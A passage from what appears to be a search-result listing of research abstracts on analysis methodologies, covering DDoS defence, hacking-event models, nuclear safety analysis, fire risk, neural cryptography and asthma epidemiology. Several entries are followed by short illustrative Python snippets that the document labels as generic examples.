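        # Hypothetical uncertain inputs: (lower bound, upper bound), uniform for simplicity.
        params = {
            "zircaloy_failure_temp_K":   (2100.0, 2500.0),
            "debris_porosity":           (0.30, 0.50),
            "candling_heat_tc_W_m2K":    (500.0, 2000.0),
            "lower_head_failure_strain": (0.05, 0.20),
        }

        def latin_hypercube(n_samples, n_dims):
            """Stratified uniform samples in [0, 1): one point per stratum per dimension."""
            cut = (np.arange(n_samples) + rng.random((n_dims, n_samples))) / n_samples
            for row in cut:
                rng.shuffle(row)
            return cut.T                                      # shape (n_samples, n_dims)

        n = 10
        unit = latin_hypercube(n, len(params))
        names = list(params)
        samples = {name: params[name][0] + unit[:, j] * (params[name][1] - params[name][0])
                   for j, name in enumerate(names)}

        for i in range(n):
            row = ", ".join(f"{name}={samples[name][i]:.3g}" for name in names)
            print(f"run {i:02d}: {row}")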

  18. Mapping the Most Significant Computer Hacking Events to a Temporal Computer Attack Model

    OpenAIRE

    Heerden , Renier ,; Pieterse , Heloise; Irwin , Barry

    2012-01-01

    Part 4: Section 3: ICT for Peace and War; International audience; This paper presents eight of the most significant computer hacking events (also known as computer attacks). These events were selected because of their unique impact, methodology, or other properties. A temporal computer attack model is presented that can be used to model computer-based attacks. This model consists of the following stages: Target Identification, Reconnaissance, Attack, and Post-Attack Reconnaissance. The...

  19. A Systematic Review of Brief Functional Analysis Methodology with Typically Developing Children

    Science.gov (United States)

    Gardner, Andrew W.; Spencer, Trina D.; Boelter, Eric W.; DuBard, Melanie; Jennett, Heather K.

    2012-01-01

    Brief functional analysis (BFA) is an abbreviated assessment methodology derived from traditional extended functional analysis methods. BFAs are often conducted when time constraints in clinics, schools or homes are of concern. While BFAs have been used extensively to identify the function of problem behavior for children with disabilities, their…

  20. An Adaptive Approach for Defending against DDoS Attacks

    Directory of Open Access Journals (Sweden)

    Muhai Li

    2010-01-01

    Full Text Available Among the various network attacks, the Distributed Denial-of-Service (DDoS) attack is a severe threat. In order to deal with this kind of attack in time, it is necessary to establish a special type of defense system that changes its strategy dynamically against attacks. In this paper, we introduce an adaptive approach for defending against DDoS attacks, based on normal traffic analysis. The approach can detect DDoS attacks and adaptively adjust its configuration according to the network condition and attack severity. In order to ensure that ordinary users can still visit the victim server that is being attacked, we provide a nonlinear traffic control formula for the system. Our simulation test indicates that the nonlinear control approach can block malicious attack packets effectively while allowing legitimate traffic flows to reach the victim.
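
    The paper's exact control formula is not given in the abstract; the snippet below is only a generic illustration of nonlinear, adaptive rate control: the fraction of incoming traffic admitted to the victim falls off as a power of the overload relative to a baseline learned from normal-traffic analysis.

        def admit_fraction(current_rate, normal_rate, alpha=2.0):
            """Nonlinear throttle: admit everything while traffic is at or below the
            learned normal rate, and shrink the admitted share as (normal/current)**alpha
            once the measured rate exceeds it. Larger alpha reacts more aggressively."""
            if current_rate <= normal_rate:
                return 1.0
            return (normal_rate / current_rate) ** alpha

        normal = 1000.0                                    # packets/s learned from normal-traffic analysis
        for current in (800, 1000, 2000, 5000, 20000):
            frac = admit_fraction(current, normal)
            print(f"measured {current:6.0f} pkt/s -> admit {frac:6.3f} "
                  f"(~{current * frac:7.0f} pkt/s reach the server)")

    In an adaptive system, the exponent and the learned baseline would themselves be adjusted as the measured attack severity changes.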

  1. Air pollution and asthma attacks in children: A case-crossover analysis in the city of Chongqing, China.

    Science.gov (United States)

    Ding, Ling; Zhu, Daojuan; Peng, Donghong; Zhao, Yao

    2017-01-01

    Data on particulate matter of diameter <2.5 μm (PM2.5) in the city of Chongqing were first announced in 2013. We wished to assess the effects of pollutants on asthmatic children in Chongqing, China. Daily numbers of hospital visits because of asthma attacks in children aged 0-18 years in 2013 were collected from the Children's Hospital of Chongqing Medical University. Data on pollutants were accessed from the nine air quality-monitoring stations in Chongqing. A time-stratified case-crossover design was applied and conditional logistic regression was undertaken to analyze the data. We found that short-term exposure to PM10, PM2.5, sulfur dioxide, nitrogen dioxide and carbon monoxide could trigger hospital visits for asthma in children. Nitrogen dioxide had an important role, whereas ozone had no effect. Copyright © 2016 Elsevier Ltd. All rights reserved.

  2. Reactor analysis support package (RASP). Volume 7. PWR set-point methodology. Final report

    International Nuclear Information System (INIS)

    Temple, S.M.; Robbins, T.R.

    1986-09-01

    This report provides an overview of the basis and methodology requirements for determining Pressurized Water Reactor (PWR) technical specifications related setpoints and focuses on development of the methodology for a reload core. Additionally, the report documents the implementation and typical methods of analysis used by PWR vendors during the 1970's to develop Protection System Trip Limits (or Limiting Safety System Settings) and Limiting Conditions for Operation. The descriptions of the typical setpoint methodologies are provided for Nuclear Steam Supply Systems as designed and supplied by Babcock and Wilcox, Combustion Engineering, and Westinghouse. The description of the methods of analysis includes the discussion of the computer codes used in the setpoint methodology. Next, the report addresses the treatment of calculational and measurement uncertainties based on the extent to which such information was available for each of the three types of PWR. Finally, the major features of the setpoint methodologies are compared, and the principal effects of each particular methodology on plant operation are summarized for each of the three types of PWR

  3. Development of the GO-FLOW reliability analysis methodology for nuclear reactor system

    International Nuclear Information System (INIS)

    Matsuoka, Takeshi; Kobayashi, Michiyuki

    1994-01-01

    Probabilistic Safety Assessment (PSA) is important in the safety analysis of technological systems and processes, such as nuclear plants, chemical and petroleum facilities, and aerospace systems. Event trees and fault trees are the basic analytical tools that have been most frequently used for PSAs. Several system analysis methods can be used in addition to, or in support of, the event- and fault-tree analysis. The need for more advanced methods of system reliability analysis has grown with the increased complexity of engineered systems. The Ship Research Institute has been developing a new reliability analysis methodology, GO-FLOW, which is a success-oriented system analysis technique capable of evaluating a large system with complex operational sequences. The research has been supported by the special research fund for Nuclear Technology, Science and Technology Agency, from 1989 to 1994. This paper describes the concept of Probabilistic Safety Assessment (PSA), an overview of various system analysis techniques, an overview of the GO-FLOW methodology, the GO-FLOW analysis support system, the procedure for treating a phased mission problem, a function for common cause failure analysis, a function for uncertainty analysis, a function for common cause failure analysis with uncertainty, and the output system that presents GO-FLOW analysis results in the form of figures or tables. The above functions are explained by analyzing sample systems, such as the PWR AFWS and the BWR ECCS. In the appendices, the structure of the GO-FLOW analysis programs and the meaning of the main variables defined in the GO-FLOW programs are described. The GO-FLOW methodology is a valuable and useful tool for system reliability analysis and has a wide range of applications. With the development of the total GO-FLOW system, this methodology has become a powerful tool in a living PSA. (author) 54 refs

  4. Design and analysis of sustainable computer mouse using design for disassembly methodology

    Science.gov (United States)

    Roni Sahroni, Taufik; Fitri Sukarman, Ahmad; Agung Mahardini, Karunia

    2017-12-01

    This paper presents the design and analysis of a computer mouse using the Design for Disassembly methodology. The existing computer mouse model contains a number of unnecessary parts that increase assembly and disassembly time in production. The objective of this project is to design a new computer mouse based on the Design for Disassembly (DFD) methodology. The main methodology of this paper proceeds from sketch generation through concept selection and concept scoring. Based on the design screening, design concept B was selected for further analysis. A new computer mouse design is proposed using a fastening system. Furthermore, three materials (ABS, polycarbonate, and high-density PE) were considered to determine the environmental impact. Sustainability analysis was conducted using SolidWorks. As a result, high-density PE gives the lowest environmental impact while providing a high maximum stress value.

  5. Fire risk analysis for nuclear power plants: Methodological developments and applications

    International Nuclear Information System (INIS)

    Kazarians, M.; Apostolakis, G.; Siv, N.O.

    1985-01-01

    A methodology to quantify the risk from fires in nuclear power plants is described. This methodology combines engineering judgment, statistical evidence, fire phenomenology, and plant system analysis. It can be divided into two major parts: (1) fire scenario identification and quantification, and (2) analysis of the impact on plant safety. This article primarily concentrates on the first part. Statistical analysis of fire occurrence data is used to establish the likelihood of ignition. The temporal behaviors of the two competing phenomena, fire propagation and fire detection and suppression, are studied and their characteristic times are compared. Severity measures are used to further specialize the frequency of the fire scenario. The methodology is applied to a switchgear room of a nuclear power plant
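
    A minimal sketch of the first part of such a methodology: quantifying a single fire scenario as the product of ignition frequency, a severity fraction, and the probability that detection and suppression lose the race against fire propagation. The exponential suppression-time model and all numerical values are illustrative assumptions, not data from the article.

    ```python
    import random


    def fire_scenario_frequency(ignition_freq_per_year,
                                mean_suppression_time_min,
                                propagation_time_min,
                                severity_fraction,
                                n_samples=100_000,
                                seed=1):
        """Illustrative quantification of one fire scenario:
            f_scenario = f_ignition * severity_fraction
                         * P(suppression slower than propagation)
        Suppression time is sampled from an exponential distribution and the
        propagation (damage) time is taken as fixed -- both are modelling
        assumptions for this sketch."""
        rng = random.Random(seed)
        failures = sum(
            1 for _ in range(n_samples)
            if rng.expovariate(1.0 / mean_suppression_time_min) > propagation_time_min
        )
        p_suppression_fails = failures / n_samples
        return ignition_freq_per_year * severity_fraction * p_suppression_fails


    freq = fire_scenario_frequency(ignition_freq_per_year=3e-2,
                                   mean_suppression_time_min=10.0,
                                   propagation_time_min=20.0,
                                   severity_fraction=0.2)
    print(f"scenario frequency ~ {freq:.2e} per reactor-year")
    ```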

  6. Critical analysis of the Bennett-Riedel attack on secure cryptographic key distributions via the Kirchhoff-Law-Johnson-noise scheme.

    Directory of Open Access Journals (Sweden)

    Laszlo B Kish

    Full Text Available Recently, Bennett and Riedel (BR) (http://arxiv.org/abs/1303.7435v1) argued that thermodynamics is not essential in the Kirchhoff-law-Johnson-noise (KLJN) classical physical cryptographic exchange method in an effort to disprove the security of the KLJN scheme. They attempted to demonstrate this by introducing a dissipation-free deterministic key exchange method with two batteries and two switches. In the present paper, we first show that BR's scheme is unphysical and that some elements of its assumptions violate basic protocols of secure communication. All our analyses are based on a technically unlimited Eve with infinitely accurate and fast measurements limited only by the laws of physics and statistics. For non-ideal situations and at active (invasive) attacks, the uncertainty principle between measurement duration and statistical errors makes it impossible for Eve to extract the key regardless of the accuracy or speed of her measurements. To show that thermodynamics and noise are essential for the security, we crack the BR system with 100% success via passive attacks, in ten different ways, and demonstrate that the same cracking methods do not function for the KLJN scheme that employs Johnson noise to provide security underpinned by the Second Law of Thermodynamics. We also present a critical analysis of some other claims by BR; for example, we prove that their equations for describing zero security do not apply to the KLJN scheme. Finally we give mathematical security proofs for each BR-attack against the KLJN scheme and conclude that the information theoretic (unconditional) security of the KLJN method has not been successfully challenged.

  7. Critical analysis of the Bennett-Riedel attack on secure cryptographic key distributions via the Kirchhoff-Law-Johnson-noise scheme.

    Science.gov (United States)

    Kish, Laszlo B; Abbott, Derek; Granqvist, Claes G

    2013-01-01

    Recently, Bennett and Riedel (BR) (http://arxiv.org/abs/1303.7435v1) argued that thermodynamics is not essential in the Kirchhoff-law-Johnson-noise (KLJN) classical physical cryptographic exchange method in an effort to disprove the security of the KLJN scheme. They attempted to demonstrate this by introducing a dissipation-free deterministic key exchange method with two batteries and two switches. In the present paper, we first show that BR's scheme is unphysical and that some elements of its assumptions violate basic protocols of secure communication. All our analyses are based on a technically unlimited Eve with infinitely accurate and fast measurements limited only by the laws of physics and statistics. For non-ideal situations and at active (invasive) attacks, the uncertainty principle between measurement duration and statistical errors makes it impossible for Eve to extract the key regardless of the accuracy or speed of her measurements. To show that thermodynamics and noise are essential for the security, we crack the BR system with 100% success via passive attacks, in ten different ways, and demonstrate that the same cracking methods do not function for the KLJN scheme that employs Johnson noise to provide security underpinned by the Second Law of Thermodynamics. We also present a critical analysis of some other claims by BR; for example, we prove that their equations for describing zero security do not apply to the KLJN scheme. Finally we give mathematical security proofs for each BR-attack against the KLJN scheme and conclude that the information theoretic (unconditional) security of the KLJN method has not been successfully challenged.

  8. A COMPARATIVE ANALYSIS OF QUALITATIVE AND QUANTITATIVE INDICATORS OF THE ATTACK PHASIS AT THE WORLD CUP IN GERMANY 2006th AND SOUTH AFRICA 2010th

    Directory of Open Access Journals (Sweden)

    Peko Vujović

    2013-07-01

    Full Text Available The subject of this paper is the recording of predefined, hypothetically significant predictors for achieving goals in modern football. Concretely, the object of this study is the mode of play of top teams, the individual characteristics of elite players, and a comparative analysis of the last two world championships. The aim of the research was to determine the qualitative and quantitative differences between successfully completed attacks at the World Cup in Germany in 2006 and in South Africa in 2010, using pre-defined variables. The task of the paper is to identify the set of variables that are good predictors of efficacy in the attack phase, and the tendencies of play that can be seen using the variables recorded on the sample matches in the last two world championships. The steps of the work are as follows: to determine whether there are significant differences in the positions of the players who scored goals and assisted in the two observed world championships; to determine whether there are significant differences in the time intervals in which goals were scored in the two above-mentioned competitions; to determine whether there are significant differences in the number of ball contacts by players just before the successful completion of an attack in the mentioned competitions; and to determine whether there are significant differences in the positions on the pitch from which goals were scored and from which assists were made. On the basis of the processed variables, conclusions grounded in relevant and reliable parameters were drawn.

  9. Different methodologies in neutron activation to approach the full analysis of environmental and nutritional samples

    International Nuclear Information System (INIS)

    Freitas, M.C.; Dionisio, I.; Dung, H.M.

    2008-01-01

    Different methodologies of neutron activation analysis (NAA) are now available at the Technological and Nuclear Institute (Sacavem, Portugal), namely Compton suppression, epithermal activation, replicate and cyclic activation, and low energy photon measurement. Prompt gamma activation analysis (PGAA) will be implemented soon. Results by instrumental NAA and PGAA on environmental and nutritional samples are discussed herein, showing that PGAA - carried out at the Institute of Isotope Research (Budapest, Hungary) - brings about an effective input to assessing relevant elements. Sensitivity enhancement in NAA by Compton suppression is also illustrated. Through a judicious combination of methodologies, practically all elements of interest in pollution and nutrition terms can be determined. (author)

  10. The IDEAL (Integrated Design and Engineering Analysis Languages) modeling methodology: Capabilities and Applications

    Science.gov (United States)

    Evers, Ken H.; Bachert, Robert F.

    1987-01-01

    The IDEAL (Integrated Design and Engineering Analysis Languages) modeling methodology has been formulated and applied over a five-year period. It has proven to be a unique, integrated approach utilizing a top-down, structured technique to define and document the system of interest; a knowledge engineering technique to collect and organize system descriptive information; a rapid prototyping technique to perform preliminary system performance analysis; and a sophisticated simulation technique to perform in-depth system performance analysis.

  11. Analysis Planning Methodology: For Thesis, Joint Applied Project, & MBA Research Reports

    OpenAIRE

    Naegle, Brad R.

    2010-01-01

    Acquisition Research Handbook Series Purpose: This guide provides the graduate student researcher—you—with techniques and advice on creating an effective analysis plan, and it provides methods for focusing the data-collection effort based on that analysis plan. As a side benefit, this analysis planning methodology will help you to properly scope the research effort and will provide you with insight for changes in that effort. The information presented herein was supported b...

  12. Development of Non-LOCA Safety Analysis Methodology with RETRAN-3D and VIPRE-01/K

    International Nuclear Information System (INIS)

    Kim, Yo-Han; Cheong, Ae-Ju; Yang, Chang-Keun

    2004-01-01

    Korea Electric Power Research Institute has launched a project to develop an in-house non-loss-of-coolant-accident analysis methodology to overcome the hardships caused by the narrow analytical scopes of existing methodologies. Prior to the development, some safety analysis codes were reviewed, and RETRAN-3D and VIPRE-01 were chosen as the base codes. The codes have been modified to improve the analytical capabilities required to analyze the nuclear power plants in Korea. The methodologies of the vendors and the Electric Power Research Institute have been reviewed, and some documents of foreign utilities have been used to compensate for the insufficiencies. For the next step, a draft methodology for pressurized water reactors has been developed and modified to apply to Westinghouse-type plants in Korea. To verify the feasibility of the methodology, some events of Yonggwang Units 1 and 2 have been analyzed from the standpoints of reactor coolant system pressure and the departure from nucleate boiling ratio. The results of the analyses show trends similar to those of the Final Safety Analysis Report

  13. Methodology for object-oriented real-time systems analysis and design: Software engineering

    Science.gov (United States)

    Schoeffler, James D.

    1991-01-01

    Successful application of software engineering methodologies requires an integrated analysis and design life-cycle in which the various phases flow smoothly 'seamlessly' from analysis through design to implementation. Furthermore, different analysis methodologies often lead to different structuring of the system so that the transition from analysis to design may be awkward depending on the design methodology to be used. This is especially important when object-oriented programming is to be used for implementation when the original specification and perhaps high-level design is non-object oriented. Two approaches to real-time systems analysis which can lead to an object-oriented design are contrasted: (1) modeling the system using structured analysis with real-time extensions which emphasizes data and control flows followed by the abstraction of objects where the operations or methods of the objects correspond to processes in the data flow diagrams and then design in terms of these objects; and (2) modeling the system from the beginning as a set of naturally occurring concurrent entities (objects) each having its own time-behavior defined by a set of states and state-transition rules and seamlessly transforming the analysis models into high-level design models. A new concept of a 'real-time systems-analysis object' is introduced and becomes the basic building block of a series of seamlessly-connected models which progress from the object-oriented real-time systems analysis and design system analysis logical models through the physical architectural models and the high-level design stages. The methodology is appropriate to the overall specification including hardware and software modules. In software modules, the systems analysis objects are transformed into software objects.
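
    A minimal sketch of the "real-time systems-analysis object" idea: an entity whose time-behaviour is a set of states plus state-transition rules. The class name, states, events and transition table below are illustrative assumptions; the methodology in the paper covers much more, including the seamless transformation of analysis models into design models and the treatment of hardware as well as software modules.

    ```python
    class RealTimeAnalysisObject:
        """Sketch of a systems-analysis object: a concurrent entity whose
        time-behaviour is defined by states and state-transition rules."""

        def __init__(self, name, initial_state, transitions):
            # transitions: {(state, event): next_state}
            self.name = name
            self.state = initial_state
            self.transitions = transitions
            self.history = [(0.0, initial_state)]

        def handle(self, event, time):
            """Apply a transition rule if one exists for (current state, event)."""
            key = (self.state, event)
            if key not in self.transitions:
                return False          # event ignored in this state
            self.state = self.transitions[key]
            self.history.append((time, self.state))
            return True


    # Example: a temperature sensor that cycles between idle and sampling.
    sensor = RealTimeAnalysisObject(
        name="temperature_sensor",
        initial_state="IDLE",
        transitions={
            ("IDLE", "timer_tick"): "SAMPLING",
            ("SAMPLING", "sample_done"): "IDLE",
            ("SAMPLING", "fault"): "FAILED",
        },
    )

    sensor.handle("timer_tick", time=0.10)
    sensor.handle("sample_done", time=0.15)
    print(sensor.history)   # [(0.0, 'IDLE'), (0.1, 'SAMPLING'), (0.15, 'IDLE')]
    ```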

  14. Towards a Multimodal Methodology for the Analysis of Translated/Localised Games

    Directory of Open Access Journals (Sweden)

    Bárbara Resende Coelho

    2016-12-01

    Full Text Available Multimedia materials require research methodologies that are able to comprehend all of their assets. Videogames are the epitome of multimedia, joining image, sound, video, animation, graphics and text with the interactivity factor. A methodology to conduct research into translation and localisation of videogames should be able to analyse all of their assets and features. This paper sets out to develop a research methodology for games and their translations/localisations that goes beyond the collection and analysis of “screenshots” and includes as many of their assets as possible. Using the fully localised version of the game Watchdogs, this paper shows how tools and technologies allow for transcending the mere analysis of linguistic contents within multimedia materials. Using the ELAN (Language Archive) software to analyse Portuguese-language dubbed and English-language subtitled excerpts from the videogame, it was possible to identify patterns in both linguistic and audio-visual elements, as well as to correlate them.

  15. Applications of a methodology for the analysis of learning trends in nuclear power plants

    International Nuclear Information System (INIS)

    Cho, Hang Youn; Choi, Sung Nam; Yun, Won Yong

    1995-01-01

    A methodology is applied to identify the learning trend related to the safety and availability of U.S. commercial nuclear power plants. The application is intended to aid in reducing the likelihood of human errors. To ensure that the methodology can be easily adapted to various types of classification schemes for operating data, a data bank classified by the Transient Analysis Classification and Evaluation (TRACE) scheme is selected for the methodology. The significance criteria for human-initiated events affecting the systems and for events caused by human deficiencies were used. Clustering analysis was used to identify the learning trend in multi-dimensional histograms. A computer code is developed based on the K-Means algorithm and applied to find the learning period in which error rates decrease monotonically with plant age.
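
    A hedged sketch of the clustering step: K-Means applied to (plant age, error rate) points to separate a learning period, in which rates fall monotonically, from a later plateau. The synthetic event rates and the use of scikit-learn are assumptions for illustration; the study itself used TRACE-classified operating data.

    ```python
    import numpy as np
    from sklearn.cluster import KMeans

    # Synthetic human-error event rates (events per reactor-year) binned by
    # plant age in years -- illustrative data only.
    plant_age = np.arange(1, 16)
    error_rate = np.array([9.1, 8.4, 7.2, 6.0, 5.1, 4.4, 3.9, 3.5,
                           3.4, 3.6, 3.3, 3.5, 3.2, 3.4, 3.3])

    # Cluster (age, rate) points; standardise so both axes carry weight.
    features = np.column_stack([plant_age, error_rate])
    features = (features - features.mean(axis=0)) / features.std(axis=0)
    labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(features)

    # The cluster whose rates fall monotonically with age is taken as the
    # candidate "learning period".
    for k in np.unique(labels):
        ages = plant_age[labels == k]
        rates = error_rate[labels == k]
        monotone = bool(np.all(np.diff(rates) <= 0))
        print(f"cluster {k}: ages {ages.min()}-{ages.max()}, "
              f"monotonically decreasing: {monotone}")
    ```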

  16. Methodology for Quantitative Analysis of Large Liquid Samples with Prompt Gamma Neutron Activation Analysis using Am-Be Source

    International Nuclear Information System (INIS)

    Idiri, Z.; Mazrou, H.; Beddek, S.; Amokrane, A.

    2009-01-01

    An optimized set-up for prompt gamma neutron activation analysis (PGNAA) with an Am-Be source is described and used for the analysis of large liquid samples. A methodology for quantitative analysis is proposed: it consists of normalizing the prompt gamma count rates with thermal neutron flux measurements carried out with a He-3 detector and gamma attenuation factors calculated using MCNP-5. The relative and absolute methods are considered. This methodology is then applied to the determination of cadmium in industrial phosphoric acid. The same sample is then analyzed by the inductively coupled plasma (ICP) method. Our results are in good agreement with those obtained with the ICP method.

  17. Heart Attack Payment - National

    Data.gov (United States)

    U.S. Department of Health & Human Services — Payment for heart attack patients measure – national data. This data set includes national-level data for payments associated with a 30-day episode of care for heart...

  18. Heart Attack Payment - Hospital

    Data.gov (United States)

    U.S. Department of Health & Human Services — Payment for heart attack patients measure – provider data. This data set includes provider data for payments associated with a 30-day episode of care for heart...

  19. Heart Attack Payment - State

    Data.gov (United States)

    U.S. Department of Health & Human Services — Payment for heart attack patients measure – state data. This data set includes state-level data for payments associated with a 30-day episode of care for heart...

  20. Analysis of turbulent separated flows for the NREL airfoil using anisotropic two-equation models at higher angles of attack

    Energy Technology Data Exchange (ETDEWEB)

    Zhang Shijie [Tsinghua University, Beijing (China). School of Architecture]; Yuan Xin; Ye Dajun [Tsinghua University, Beijing (China). Dept. of Thermal Engineering]

    2001-07-01

    Numerical simulations of the turbulent flow fields at stall conditions are presented for the NREL (National Renewable Energy Laboratory) S809 airfoil. The flow is modelled as compressible, viscous, steady/unsteady and turbulent. Four two-equation turbulence models (isotropic κ-ε and q-ω models, anisotropic κ-ε and q-ω models) are applied to close the Reynolds-averaged Navier-Stokes equations. The governing equations are integrated in time by a new LU-type implicit scheme. To accurately model the convection terms in the mean-flow and turbulence model equations, a modified fourth-order high-resolution MUSCL TVD scheme is incorporated. The large-scale separated flow fields and their losses at stall and post-stall conditions are analyzed for the NREL S809 airfoil at various angles of attack (α) from 0 to 70 degrees. The numerical results show excellent to fairly good agreement with the experimental data. The feasibility of the present numerical method and the influence of the four turbulence models are also investigated. (author)

  1. Cooperating attackers in neural cryptography.

    Science.gov (United States)

    Shacham, Lanir N; Klein, Einat; Mislovaty, Rachel; Kanter, Ido; Kinzel, Wolfgang

    2004-06-01

    A successful attack strategy in neural cryptography is presented. The neural cryptosystem, based on synchronization of neural networks by mutual learning, has been recently shown to be secure under different attack strategies. The success of the advanced attacker presented here, called the "majority-flipping attacker," does not decay with the parameters of the model. This attacker's outstanding success is due to its using a group of attackers which cooperate throughout the synchronization process, unlike any other attack strategy known. An analytical description of this attack is also presented, and fits the results of simulations.
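
    The majority-flipping attack itself coordinates an ensemble of attacker networks that vote on their internal representations; the sketch below implements only the underlying primitive that both the partners and the attackers rely on, namely mutual synchronization of two tree parity machines by a Hebbian rule. The parameters K, N and L and the step budget are illustrative assumptions, not values from the paper.

    ```python
    import numpy as np

    # Tree parity machine parameters (illustrative): K hidden units,
    # N inputs per unit, weights bounded in [-L, L].
    K, N, L = 3, 10, 3
    rng = np.random.default_rng(0)


    def tpm_output(weights, x):
        """sigma_k = sign(w_k . x_k); tau = product of the sigma_k."""
        local_fields = np.sum(weights * x, axis=1)
        sigma = np.where(local_fields >= 0, 1, -1)
        return int(np.prod(sigma)), sigma


    def hebbian_update(weights, x, sigma, tau_self, tau_other):
        """Update only when the two parties agree, and only the hidden units
        whose output matches the common output (standard Hebbian rule)."""
        if tau_self != tau_other:
            return weights
        mask = (sigma == tau_self)[:, None]
        return np.clip(weights + mask * tau_self * x, -L, L)


    # Two parties A and B synchronise by mutual learning on shared random inputs.
    wa = rng.integers(-L, L + 1, size=(K, N))
    wb = rng.integers(-L, L + 1, size=(K, N))
    for step in range(10_000):
        x = rng.choice([-1, 1], size=(K, N))
        tau_a, sig_a = tpm_output(wa, x)
        tau_b, sig_b = tpm_output(wb, x)
        wa = hebbian_update(wa, x, sig_a, tau_a, tau_b)
        wb = hebbian_update(wb, x, sig_b, tau_b, tau_a)
        if np.array_equal(wa, wb):
            print(f"synchronised after {step + 1} exchanged outputs")
            break
    else:
        print("did not synchronise within the step budget")
    ```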

  2. Methodologies for uncertainty analysis in the level 2 PSA and their implementation procedures

    International Nuclear Information System (INIS)

    Ahn, Kwang Il; Yang, Joon Eun; Kim, Dong Ha

    2002-04-01

    The main purpose of this report is to present standardized methodologies for uncertainty analysis in the Level 2 Probabilistic Safety Assessment (PSA) and their implementation procedures, based on results obtained through a critical review of the existing methodologies for the analysis of uncertainties employed in the Level 2 PSA, especially the Accident Progression Event Tree (APET). Uncertainties employed in the Level 2 PSA are quantitative expressions of the overall knowledge of the analysts and experts participating in the probabilistic quantification of phenomenological accident progressions ranging from core melt to containment failure; their numerical values are directly related to the degree of confidence that the analyst has that a given phenomenological event or accident process will or will not occur, i.e., the analyst's subjective probabilities of occurrence. The results obtained from the Level 2 PSA uncertainty analysis become an essential contributor to the plant risk, in addition to the Level 1 PSA and Level 3 PSA uncertainties. The uncertainty analysis methodologies and their implementation procedures presented in this report were prepared based on the following criterion: 'the uncertainty quantification process must be logical, scrutable, complete, consistent and at an appropriate level of detail, as mandated by the Level 2 PSA objectives'. For the aforementioned purpose, this report deals mainly with (1) a summary of general and Level 2 PSA-specific uncertainty analysis methodologies, (2) the selection of phenomenological branch events for uncertainty analysis in the APET and a methodology for quantification of APET uncertainty inputs with its implementation procedure, (3) statistical propagation of uncertainty inputs through the APET and its implementation procedure, and (4) a formal procedure for quantification of APET uncertainties and source term categories (STCs) through the Level 2 PSA quantification codes
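
    A minimal sketch of item (3), the statistical propagation of uncertain branch probabilities through an APET, here reduced to a toy two-branch tree sampled by Monte Carlo. The branch structure, the beta and triangular distributions, and all numerical values are illustrative assumptions, not inputs from the report.

    ```python
    import numpy as np

    rng = np.random.default_rng(42)
    n = 50_000   # Monte Carlo samples

    # Uncertain branch probabilities of a toy APET, expressed as analyst
    # degree-of-confidence distributions (all values illustrative):
    #   branch 1: in-vessel recovery fails
    #   branch 2: early containment failure given no recovery
    p_no_recovery = rng.beta(2.0, 8.0, size=n)          # mean ~0.2
    p_early_cf = rng.triangular(0.01, 0.05, 0.20, n)    # mode 0.05

    core_damage_freq = 1.0e-5   # per reactor-year, taken here as a point value

    # Propagate through the tree: the frequency of the "early release" source
    # term category is the product along the branch path.
    stc_early_release = core_damage_freq * p_no_recovery * p_early_cf

    print("early-release STC frequency per reactor-year")
    print("  mean : %.2e" % stc_early_release.mean())
    print("  5th  : %.2e" % np.percentile(stc_early_release, 5))
    print("  95th : %.2e" % np.percentile(stc_early_release, 95))
    ```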

  3. A Methodology for the Analysis of Memory Response to Radiation through Bitmap Superposition and Slicing

    CERN Document Server

    Bosser, A.; Tsiligiannis, G.; Ferraro, R.; Frost, C.; Javanainen, A.; Puchner, H.; Rossi, M.; Saigne, F.; Virtanen, A.; Wrobel, F.; Zadeh, A.; Dilillo, L.

    2015-01-01

    A methodology is proposed for the statistical analysis of memory radiation test data, with the aim of identifying trends in the single-event upset (SEU) distribution. The case study treated is a 65 nm SRAM irradiated with neutrons, protons and heavy ions.

  4. A framework for characterizing usability requirements elicitation and analysis methodologies (UREAM)

    NARCIS (Netherlands)

    Trienekens, J.J.M.; Kusters, R.J.; Mannaert, H.

    2012-01-01

    Dedicated methodologies for the elicitation and analysis of usability requirements have been proposed in literature, usually developed by usability experts. The usability of these approaches by non-expert software engineers is not obvious. In this paper, the objective is to support developers and

  5. Cost and Benefit Analysis of an Automated Nursing Administration System: A Methodology*

    OpenAIRE

    Rieder, Karen A.

    1984-01-01

    In order for a nursing service administration to select the appropriate automated system for its requirements, a systematic process of evaluating alternative approaches must be completed. This paper describes a methodology for evaluating and comparing alternative automated systems based upon an economic analysis which includes two major categories of criteria: costs and benefits.

  6. Beyond Needs Analysis: Soft Systems Methodology for Meaningful Collaboration in EAP Course Design

    Science.gov (United States)

    Tajino, Akira; James, Robert; Kijima, Kyoichi

    2005-01-01

    Designing an EAP course requires collaboration among various concerned stakeholders, including students, subject teachers, institutional administrators and EAP teachers themselves. While needs analysis is often considered fundamental to EAP, alternative research methodologies may be required to facilitate meaningful collaboration between these…

  7. Combining soft system methodology and pareto analysis in safety management performance assessment : an aviation case

    NARCIS (Netherlands)

    Karanikas, Nektarios

    2016-01-01

    Although reengineering is strategically advantageous for organisations in order to remain functional and sustainable, safety must remain a priority and the respective efforts need to be maintained. This paper suggests the combination of soft system methodology (SSM) and Pareto analysis on the scope of

  8. Methodology for reactor core physics analysis - part 2; Metodologia de analise fisica do nucleo - etapa 2

    Energy Technology Data Exchange (ETDEWEB)

    Ponzoni Filho, P; Fernandes, V B; Lima Bezerra, J de; Santos, T I.C.

    1992-12-01

    The computer codes used for reactor core physics analysis are described. The modifications introduced in the public codes and the technical basis for the codes developed by the FURNAS utility are justified. An evaluation of the impact of these modifications on the parameter involved in qualifying the methodology is included. (F.E.). 5 ref, 7 figs, 5 tabs.

  9. Understanding information exchange during disaster response: Methodological insights from infocentric analysis

    Science.gov (United States)

    Toddi A. Steelman; Branda Nowell; Deena. Bayoumi; Sarah. McCaffrey

    2014-01-01

    We leverage economic theory, network theory, and social network analytical techniques to bring greater conceptual and methodological rigor to understand how information is exchanged during disasters. We ask, "How can information relationships be evaluated more systematically during a disaster response?" "Infocentric analysis"—a term and...

  10. Methodology for LOCA analysis and its qualification procedures for PWR reload licensing

    International Nuclear Information System (INIS)

    Serrano, M.A.B.

    1986-01-01

    The methodology for LOCA analysis developed by FURNAS and its qualification procedure for PWR reload licensing are presented. Digital computer codes developed by the NRC and published collectively as the WREM package were modified to obtain versions that comply with each requirement of the Brazilian licensing criteria. This methodology is applied to the Angra-1 base case to conclude the qualification process. (Author) [pt

  11. Application of survival analysis methodology to the quantitative analysis of LC-MS proteomics data.

    Science.gov (United States)

    Tekwe, Carmen D; Carroll, Raymond J; Dabney, Alan R

    2012-08-01

